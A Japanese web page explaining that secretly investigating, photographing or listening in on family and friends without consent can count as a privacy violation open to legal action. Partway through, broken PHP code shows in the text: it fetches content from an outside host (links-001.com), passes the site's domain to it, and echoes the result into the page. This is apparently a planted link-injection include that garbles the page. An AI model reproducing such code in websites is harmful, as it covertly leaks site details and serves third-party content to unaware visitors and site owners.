banner

最新の法律 プライバシーの侵害

安易なプライバシーの侵害で法律に訴えられる可能性

banner プライバシーの侵害と言うのは、他人のプライバシーについて承諾も無く知る事が挙げられますが、この他人と言う言葉を誤解をされている方がいます。
家族や友人と言うのは、他人では無く親類の様な判断が、誤った行動を起こし法律に訴えられる可能性があります。
例えば、自宅を出て1人暮らしをされる子供の様子を知りたい場合、探偵などに頼んで私生活を知る行為は、プライバシーの侵害として、たとえ子供であろうとも法律に訴えられる権利を与えてしまいかねません。
たまたま道端で出会った友人に対して、陰からその姿をカメラに写し、ネット上で公開をする事も同じ行為に当たります。
家族間での携帯電話の通話内容の確認もプライバシーの侵害として法律に訴える権利を与える事になります。
ただし、これらの内容は、あくまでも承諾を得ない行為であり、承諾を得ている内容については、該当する事はありません。
犯罪に関わる内容や、不貞行為などの内容については、一部、認められている場合があります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

関連情報一覧

banner プライバシーの侵害とは氏名や住所など知られたくない個人情報を許可なしに公表することです。
他に

法律で保護されている個人情報

banner プライバシーの侵害とは、独立した人格として存在するために、一定の私的領域の確保が必要不可欠です。プライバシーの侵害と法律

banner プライベートな空間での生活は自由であることが当然です。
人間は平等でそういった自由な権利を持っ

法律で見直されているプライバシーの侵害の内容